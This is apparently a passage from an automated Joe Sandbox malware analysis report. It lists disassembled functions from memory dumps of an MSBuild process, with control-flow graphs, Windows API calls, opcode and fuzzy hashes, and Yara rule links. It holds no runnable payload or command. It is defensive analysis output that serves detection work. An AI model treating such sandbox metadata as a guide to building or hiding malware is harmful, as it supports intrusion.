                                                                                                                              Function 01194F1C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1536 1194f1c-119a0ac 1539 119a15c-119a17c call 1194df4 1536->1539 1540 119a0b2-119a0b7 1536->1540 1547 119a17f-119a18c 1539->1547 1542 119a0b9-119a0f0 1540->1542 1543 119a10a-119a142 CallWindowProcW 1540->1543 1549 119a0f9-119a108 1542->1549 1550 119a0f2-119a0f8 1542->1550 1545 119a14b-119a15a 1543->1545 1546 119a144-119a14a 1543->1546 1545->1547 1546->1545 1549->1547 1550->1549
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0119A131
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              • Opcode ID: 32f8d143470a214bd2fa68c3d16a6af4f853af4d47dec4ce40ccaf616d13af1e
                                                                                                                              • Instruction ID: 2740fd011bc736fc19c527fe719a9610abc8e0ec5a990217b7560874812a3a7b
                                                                                                                              • Opcode Fuzzy Hash: 32f8d143470a214bd2fa68c3d16a6af4f853af4d47dec4ce40ccaf616d13af1e
                                                                                                                              • Instruction Fuzzy Hash: FB411AB4900309CFDB18CF99C848AAAFBF5FF89314F25C459D519AB321D734A845CBA0
                                                                                                                              Function 06AB992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1553 6ab992c 1554 6ab99eb-6ab99fc 1553->1554 1555 6ab99fe 1554->1555 1556 6ab9a03-6ab9a0c 1554->1556 1555->1556 1558 6ab97e3-6ab9808 1556->1558 1559 6ab9a12-6ab9a25 1556->1559 1560 6ab980a 1558->1560 1561 6ab980f-6ab9846 1558->1561 1562 6ab9a2c-6ab9a47 1559->1562 1563 6ab9a27 1559->1563 1560->1561 1572 6ab9848 1561->1572 1573 6ab984d-6ab987f 1561->1573 1564 6ab9a49 1562->1564 1565 6ab9a4e-6ab9a62 1562->1565 1563->1562 1564->1565 1569 6ab9a69-6ab9a7f LdrInitializeThunk 1565->1569 1570 6ab9a64 1565->1570 1571 6ab9a81-6ab9b7e 1569->1571 1570->1569 1576 6ab9b80-6ab9b85 1571->1576 1577 6ab9b86-6ab9b90 1571->1577 1572->1573 1578 6ab98e3-6ab98f6 1573->1578 1579 6ab9881-6ab98a6 1573->1579 1576->1577 1583 6ab98f8 1578->1583 1584 6ab98fd-6ab9922 1578->1584 1580 6ab98a8 1579->1580 1581 6ab98ad-6ab98db 1579->1581 1580->1581 1581->1578 1583->1584 1587 6ab9931-6ab9969 1584->1587 1588 6ab9924-6ab9925 1584->1588 1589 6ab996b 1587->1589 1590 6ab9970-6ab99d1 call 6ab9328 1587->1590 1588->1559 1589->1590 1596 6ab99d8-6ab99ea 1590->1596 1597 6ab99d3 1590->1597 1596->1554 1597->1596
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 06AB9A6E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3589729156.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_6ab0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4bf9f0da8562345b642d8288f211648e8810c1d137d5c08d44ec700aeea6dfbf
                                                                                                                              • Instruction ID: 9293039648d8a46fa86757b9dff479c1046dfc71f41d4d9dbe4abb9dc5643e7c
                                                                                                                              • Opcode Fuzzy Hash: 4bf9f0da8562345b642d8288f211648e8810c1d137d5c08d44ec700aeea6dfbf
                                                                                                                              • Instruction Fuzzy Hash: BA119074E002089FEB44EBE8C484AEEBBF9FF89304F109158E904E7202D7309942CF50
                                                                                                                              Function 01194C14 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1599 1194c14-1195980 1601 1195988-11959b3 GetModuleHandleW 1599->1601 1602 1195982-1195985 1599->1602 1603 11959bc-11959d0 1601->1603 1604 11959b5-11959bb 1601->1604 1602->1601 1604->1603
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0119576C), ref: 011959A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 8b475e8e5654edfd57d31f0d9e4e58502795abe51f9d75550237e894f7fad7cf
                                                                                                                              • Instruction ID: 701dbfaec7efd37fb134b93cb932379f29aec0411c82d7f05cdb341daa914b97
                                                                                                                              • Opcode Fuzzy Hash: 8b475e8e5654edfd57d31f0d9e4e58502795abe51f9d75550237e894f7fad7cf
                                                                                                                              • Instruction Fuzzy Hash: FF1132B1C002098FEB14CF9AC444BDEFBF5EB89620F10841AD969B7200D375A945CFA5
                                                                                                                              Function 0119C5B0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0119C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: 9601d4a71a2b7e3eea7b8517b0e564ad1c9fc8f4f33ce06941b849ce9aea4490
                                                                                                                              • Instruction ID: f302066ef870e5ebd5da54bb2df540f91e81233ed02c5f13954d8e3c5df7fd47
                                                                                                                              • Opcode Fuzzy Hash: 9601d4a71a2b7e3eea7b8517b0e564ad1c9fc8f4f33ce06941b849ce9aea4490
                                                                                                                              • Instruction Fuzzy Hash: A51142B18003488FDB10DFAAD444BDEBFF8EB48324F20845AD558A7310C339AA44CFA5
                                                                                                                              Function 0119B720 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0119C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              • Opcode ID: 741cc7de37a0846dd7ee279a57750a4eb332bbff390b6c8807674afd3bae168e
                                                                                                                              • Instruction ID: 1b82702f87c38cf95c67809a8f4ca100badf69cebfafb1bb2431ca309006bd81
                                                                                                                              • Opcode Fuzzy Hash: 741cc7de37a0846dd7ee279a57750a4eb332bbff390b6c8807674afd3bae168e
                                                                                                                              • Instruction Fuzzy Hash: 6A1103B59003498FDB14DF9AD544B9EBBF8EB48220F20845AD559A7300C378A944CFA5
                                                                                                                              Function 02EBE007 Relevance: .7, Instructions: 653COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2b490c0b5bd8d4027a6d6d535ef0a39214519d58f0caa1759e99f460e03476e4
                                                                                                                              • Instruction ID: de9b185453328e3545e59d9aac669952ac58a74974a470a53e9667b837c1a613
                                                                                                                              • Opcode Fuzzy Hash: 2b490c0b5bd8d4027a6d6d535ef0a39214519d58f0caa1759e99f460e03476e4
                                                                                                                              • Instruction Fuzzy Hash: 1C12A8388E22438FD6546F32F6BC16A7A61FB1F3637C9AD40E11FC9845DB3114E88A61
                                                                                                                              Function 02EBE018 Relevance: .6, Instructions: 647COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a0094a1cf5ebaf19a8e1208b93261fdebadd2bf3b97eaf287af284376ea3beaf
                                                                                                                              • Instruction ID: b2b9e911e5be54d7f2dcc6947a82b643e7660e6dc02dbbd0f28137b2075707a4
                                                                                                                              • Opcode Fuzzy Hash: a0094a1cf5ebaf19a8e1208b93261fdebadd2bf3b97eaf287af284376ea3beaf
                                                                                                                              • Instruction Fuzzy Hash: D81298388E22438FD6546F32F6BC16A7A61FB1F3637C9AD40E11FC9845DB7114E88A61
                                                                                                                              Function 02EB0C8F Relevance: .5, Instructions: 545COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 12e1b71a975fc36c45f6e713fc0b13b9d7bac3d8ee5817151ce4f507c3bdbf42
                                                                                                                              • Instruction ID: e3929d4ae42730c053d5a3901a8e74f8a3b17653fc7b465cd3bd6c0265018cfa
                                                                                                                              • Opcode Fuzzy Hash: 12e1b71a975fc36c45f6e713fc0b13b9d7bac3d8ee5817151ce4f507c3bdbf42
                                                                                                                              • Instruction Fuzzy Hash: 6C52EA74941219CFCB54DF28EE94A9DBBB2FB88301F5085ADD849A7350DB386E95CF80
                                                                                                                              Function 02EB0CA0 Relevance: .5, Instructions: 539COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 09a4af2c9461c2d8439d1c293bc31ec5cbff84a9ecd79b84155088d2a80c3e8c
                                                                                                                              • Instruction ID: 4259afd89ded4a7dd7547a4c8c14991be2fec2a612592c3cdcff9f891f47bf1e
                                                                                                                              • Opcode Fuzzy Hash: 09a4af2c9461c2d8439d1c293bc31ec5cbff84a9ecd79b84155088d2a80c3e8c
                                                                                                                              • Instruction Fuzzy Hash: 6752EA74941219CFCB54DF28EE94A9DBBB2FB88301F5085ADD849A7350DB386E95CF80
                                                                                                                              Function 02EB76F1 Relevance: .5, Instructions: 472COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3f0337f8269a00b8296fa2bd154f27a9a09c75e7c4e79c18d7b36e476fff0aa8
                                                                                                                              • Instruction ID: 2d10bb03c10ce70a236015a8869ca57b3a30d7defae0c007ab050c6c7f27a2d2
                                                                                                                              • Opcode Fuzzy Hash: 3f0337f8269a00b8296fa2bd154f27a9a09c75e7c4e79c18d7b36e476fff0aa8
                                                                                                                              • Instruction Fuzzy Hash: B6124831A402098FCB15CF69D994AEEBBF2EF88318F159599E8099B7A1D730ED41CF50
                                                                                                                              Function 02EB5F38 Relevance: .3, Instructions: 269COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3d0d230c2ee09b42bea86de371d333cff4e6fee22092e6cd532a7626f52f565c
                                                                                                                              • Instruction ID: e1d3c312e115b0b3f66dc1380dc755c3d11c2f8cdfcfa69be2c7e7163c28cf41
                                                                                                                              • Opcode Fuzzy Hash: 3d0d230c2ee09b42bea86de371d333cff4e6fee22092e6cd532a7626f52f565c
                                                                                                                              • Instruction Fuzzy Hash: B291CF30B842048FDB169F25D858BAF7BF6BF88308F559869E446CB391DB35C841CB91
                                                                                                                              Function 02EB6498 Relevance: .2, Instructions: 231COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2fb3cc1c74ab22e24554fe2e3b6a9ffe3baeecf0146edb68d214621f0f5de921
                                                                                                                              • Instruction ID: 81fbd158f4184c8c03bf3a805c405481b9b062b4396c2e39f1c7068f38560247
                                                                                                                              • Opcode Fuzzy Hash: 2fb3cc1c74ab22e24554fe2e3b6a9ffe3baeecf0146edb68d214621f0f5de921
                                                                                                                              • Instruction Fuzzy Hash: CF819D34A81505DFCB15CF79C484AEBBBBABF89308B15E169D505E7368DB31E841CBA0
                                                                                                                              Function 02EB9A10 Relevance: .2, Instructions: 231COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0256506efa93dbbee4c8f94b196ef63e03100a8b42b2f7b879435a6e4e09c7a0
                                                                                                                              • Instruction ID: 65db1512d1131e977a8ced699cfbeffdd3042a96a9cf380c57a5bb687cbf24d2
                                                                                                                              • Opcode Fuzzy Hash: 0256506efa93dbbee4c8f94b196ef63e03100a8b42b2f7b879435a6e4e09c7a0
                                                                                                                              • Instruction Fuzzy Hash: 738118319406059FCB12CF28D884AEBBBB6FF86324B15D665D95897356D331F812CFA0
                                                                                                                              Function 02EB80D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2fc865f89237585eb4fae2bc9823efdcab2b5bd1605321489bedf66cc97373bd
                                                                                                                              • Instruction ID: 6dcf1a6e084c7fa4af7bf4b75ff42bd99e5e0fbf81884b48bec6120d2d67f9fc
                                                                                                                              • Opcode Fuzzy Hash: 2fc865f89237585eb4fae2bc9823efdcab2b5bd1605321489bedf66cc97373bd
                                                                                                                              • Instruction Fuzzy Hash: 55712F34B805058FCB16DF69C894AEF7BEAAF49248F1594A9E805DB371DB70DC41CB50
                                                                                                                              Function 02EBAEBA Relevance: .2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e53923f89672d713dbdbeb8eeaeef1eb09fdc7bfc3232c681e3a0695a3ec60e
                                                                                                                              • Instruction ID: 8eca713c2fbf1f94332a14c7e58717d6ee08f893b1363066d70311bebdd54a9a
                                                                                                                              • Opcode Fuzzy Hash: 8e53923f89672d713dbdbeb8eeaeef1eb09fdc7bfc3232c681e3a0695a3ec60e
                                                                                                                              • Instruction Fuzzy Hash: 39619E31B802058FCB05DB69D844AAFBBB6BF88718F14D569E916DB394DB31DC41CBA0
                                                                                                                              Function 02EBF71F Relevance: .2, Instructions: 154COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9fe477f9cacaabb038d923449fd2e1ca3191aa1cdfc1fe536d90070d5e08c4f7
                                                                                                                              • Instruction ID: cbc2bae6365d1d8c251c8d1e5df7411b425847169c999be3bb9009b599063cd6
                                                                                                                              • Opcode Fuzzy Hash: 9fe477f9cacaabb038d923449fd2e1ca3191aa1cdfc1fe536d90070d5e08c4f7
                                                                                                                              • Instruction Fuzzy Hash: F8510174D01219DFDB25DFA5D858AAEBBB2FF88300F208529E805BB350DB396945CF40
                                                                                                                              Function 02EB9C30 Relevance: .2, Instructions: 150COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f49d7e9c37dafae8602c3f1e46fd4bf551b3f09ef33b111d88861ca76aba6fa6
                                                                                                                              • Instruction ID: e4735b845e92e8acf6f06ae687d82c93a9b2dc4ae726533110d509aa39128a3b
                                                                                                                              • Opcode Fuzzy Hash: f49d7e9c37dafae8602c3f1e46fd4bf551b3f09ef33b111d88861ca76aba6fa6
                                                                                                                              • Instruction Fuzzy Hash: 48516E307402059FDB01DE6AC844BAB7BE6EF89355F14C866EA09CB256D771DC42CBA1
                                                                                                                              Function 02EBD548 Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8c31e3c9e925391aeb3cd896edd3a40e13eb8caf65da4de3d103423fec1ffd70
                                                                                                                              • Instruction ID: 58baf338f1466ea8c022640ead9ecfa1bf4e6ee519a7b3704faf86decf27e1db
                                                                                                                              • Opcode Fuzzy Hash: 8c31e3c9e925391aeb3cd896edd3a40e13eb8caf65da4de3d103423fec1ffd70
                                                                                                                              • Instruction Fuzzy Hash: 0D518474E01208DFDB54DFAAD9849DDBBF2BF89300F209169E819AB365DB31A905CF50
                                                                                                                              Function 02EB41A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b81f929809a81e497e817dd45e76063b95910d1baefa9ea72a134146016eca22
                                                                                                                              • Instruction ID: 5b237aa3f12422101dc545ad5be69871ca9bfb9c953114953c498cf0d2e5ca93
                                                                                                                              • Opcode Fuzzy Hash: b81f929809a81e497e817dd45e76063b95910d1baefa9ea72a134146016eca22
                                                                                                                              • Instruction Fuzzy Hash: 06517F74E01208CFCB09DFA9D59499DBBF2FF89310B209469E809AB365DB35AD42CF54
                                                                                                                              Function 02EBA303 Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 683c1b8322a61e5ffff5e2ae444f1111db853b722f9d162b66300dee17a6fe95
                                                                                                                              • Instruction ID: 843b773da144f709fe62d02fa93a67017c0437a00d1797e731f077e886bb9103
                                                                                                                              • Opcode Fuzzy Hash: 683c1b8322a61e5ffff5e2ae444f1111db853b722f9d162b66300dee17a6fe95
                                                                                                                              • Instruction Fuzzy Hash: EF419D31A44249DFCF12CFA8C848BDEBBB2AF49314F04D465E915AB391E370E954CB50
                                                                                                                              Function 02EB3CB1 Relevance: .1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8630609ff9c424bd04782dfccd2fd686690259d891e383aa0ed871d1e2bb68d1
                                                                                                                              • Instruction ID: a414ffcfb5c0a3bf6f9ba81ee4d0c82eeada203cb86f304b322242cdedc44369
                                                                                                                              • Opcode Fuzzy Hash: 8630609ff9c424bd04782dfccd2fd686690259d891e383aa0ed871d1e2bb68d1
                                                                                                                              • Instruction Fuzzy Hash: 30316E317842658BDF1A467998953FFABA6AFC5208F18D4BEE802C3380DB75CC45C760
                                                                                                                              Function 02EBFDBA Relevance: .1, Instructions: 115COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 943ec125e25cb55a487252261ace3e4d3b394ed529ab16c5f2557e48661c23d8
                                                                                                                              • Instruction ID: 00e7152aed758cac4942d07ef96e7096276740c46e7a72266bd7399c2b945baf
                                                                                                                              • Opcode Fuzzy Hash: 943ec125e25cb55a487252261ace3e4d3b394ed529ab16c5f2557e48661c23d8
                                                                                                                              • Instruction Fuzzy Hash: 7F41DE74E422088FDB14DFA5D9847EEBBF2FF89300F249529E805A7294DB385A46CF50
                                                                                                                              Function 02EB6FC8 Relevance: .1, Instructions: 112COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b7bf48fd3dd12ba5ea69cd6a677f3beddee841b403d17e202c6d9c61223f85b
                                                                                                                              • Instruction ID: a021454c8cb293d3a96a4548fc9b86596c917a6f017d7246822b599337c6f4b2
                                                                                                                              • Opcode Fuzzy Hash: 4b7bf48fd3dd12ba5ea69cd6a677f3beddee841b403d17e202c6d9c61223f85b
                                                                                                                              • Instruction Fuzzy Hash: 1041DE32A402489FCB128F64C844BABBBF6EF84304F04D46AE815DB691DB79DD55CBA1
                                                                                                                              Function 02EB5658 Relevance: .1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7050285b617426aa7dd894acdd9442bf25ebe8d18b458aee2dafcedddcce3177
                                                                                                                              • Instruction ID: d525abebba6ad1870b27cb8b8eaf4f13109fbf54343b861ab1d7ccb147d5b5b0
                                                                                                                              • Opcode Fuzzy Hash: 7050285b617426aa7dd894acdd9442bf25ebe8d18b458aee2dafcedddcce3177
                                                                                                                              • Instruction Fuzzy Hash: D3319F31781109DFCF129F65E854AAF3BB2EF48304F909869F91597244DB39CD62CB90
                                                                                                                              Function 02EB8EF8 Relevance: .1, Instructions: 100COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d43d8827c5597b48627e65620286446109f17c104e384e3a6fadd02bf6d9c1f5
                                                                                                                              • Instruction ID: b2accee183f702222c3cf4af48fc57ba22399521f30abb3ed16fc36bb71e0d44
                                                                                                                              • Opcode Fuzzy Hash: d43d8827c5597b48627e65620286446109f17c104e384e3a6fadd02bf6d9c1f5
                                                                                                                              • Instruction Fuzzy Hash: 7E31B4303811098FCB26CB6AD8587BF776FBF84704B14A86AE052CB392DB28CC81C755
                                                                                                                              Function 02EB8380 Relevance: .1, Instructions: 87COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
